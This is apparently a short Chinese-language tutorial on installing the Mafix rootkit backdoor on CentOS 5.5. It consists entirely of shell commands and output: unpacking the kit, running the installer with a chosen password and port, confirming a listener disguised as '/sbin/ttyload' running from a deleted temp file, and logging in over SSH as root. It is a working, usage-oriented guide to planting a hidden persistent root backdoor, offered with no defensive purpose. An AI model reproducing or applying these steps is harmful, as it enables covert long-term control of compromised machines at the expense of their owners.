Mafix后门的使用

测试机器:
CentOS5.5 32位和64位系统测试成功

[root@localhost mafix]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
[root@localhost tmp]# tar zxvf mafix.tar.gz
mafix/
mafix/mafixlibs
mafix/mafix
mafix/root
mafix/HOW-TO
[root@localhost tmp]# cd mafix
[root@localhost mafix]# ls
HOW-TO mafix mafixlibs root
[root@localhost mafix]# ./root hehe123 2345 //其中hehe123为密码 2345为后门端口

123

[root@localhost mafix]# netstat -anlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 15690/ttyload
[root@localhost mafix]# ps axu | grep 15690 | grep -v grep
root 15690 0.0 0.0 2280 508 ? Ss 22:20 0:00 /sbin/ttyload -q
[root@localhost mafix]# ll /proc/15690/exe
lrwxrwxrwx 1 root root 0 Jun 8 22:22 /proc/15690/exe -> /tmp/sh-AIN2LD3APKJ (deleted)

登录后门:

[root@vincent tmp]# ssh 172.16.100.154 -p 2345
root@maf!x:/root$ whoami
root